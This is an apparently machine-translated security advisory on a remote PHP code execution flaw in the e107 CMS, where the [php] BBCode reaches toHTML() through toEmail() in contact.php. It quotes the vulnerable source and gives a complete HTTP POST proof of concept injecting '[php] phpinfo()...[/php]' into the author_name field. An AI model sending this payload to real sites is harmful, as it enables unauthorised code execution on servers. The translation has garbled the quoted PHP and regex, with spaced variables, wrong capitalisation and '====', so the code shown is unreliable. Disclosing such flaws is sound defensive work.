Arbitrary PHP code execution vulnerability in e107 BBCode

E107 is a content management system written in php.

Bbcode [php] In e107 allows arbitrary PHP code execution. This method is dangerous. The e107 configuration usually prohibits all users from accessing this bbcode. The administrator can activate this function on demand for specific user groups.

The access control check in e107 is not implemented in the bbcode parser but in some external functions that call the bbcode parser. For example:

Function post_toHTML ($ text, $ modifier = true, $ extra = ){
...

// If user is not allowed to use [php] change to entities
If (! Check_class ($ pref [php_bbcode])
{
$ Text = preg_replace ("# [(php) # I", "& #91; \ 1", $ text );
}

Return ($ modifier? $ This-> toHTML ($ text, true, $ extra): $ text );
}

This Code shows that the access check for [php] is not performed in toHTML () mode, because the check has been executed externally. This means that user input should not be directly in toHTML () mode, otherwise Remote PHP code may be executed.

However, in other places, user input can reach toHTML (), for example, in the toEmail () method:

Function toEmail ($ text, $ posted = "", $ mod = "parse_ SC, no_make_clickable ")
{
If ($ posted ==== TRUE & MAGIC_QUOTES_GPC)
{
$ Text = stripslashes ($ text );
}

$ Text = (strtolower ($ mod )! = "Rawtext ")? $ This-> replaceConstants ($ text, "full"): $ text;
$ Text = $ this-> toHTML ($ text, TRUE, $ mod );
Return $ text;
}

If user input is used in the toEmail () method, Remote PHP code may be executed. An example of this situation is in the contact. php file:

If (isset ($ _ POST [send-contactus]) {

$ Error = "";

$ Sender_name = $ tp-> toEmail ($ _ POST [author_name], TRUE, "rawtext ");
$ Sender = check_email ($ _ POST [email_send]);
$ Subject = $ tp-> toEmail ($ _ POST [subject], TRUE, "rawtext ");
$ Body = $ tp-> toEmail ($ _ POST [body], TRUE, "rawtext ");

When a POST request is submitted to the contact. PHP file, arbitrary PHP code is executed on the server.

Test code:

POST/contact. php HTTP/1.1
Host: xxxx
User-Agent: e107 0.7.20 Remote Code Execution Exploit
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

Send-contactus = 1 & author_name = [php] phpinfo () % 3 bdie () % 3b [/php] &

Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://e107.org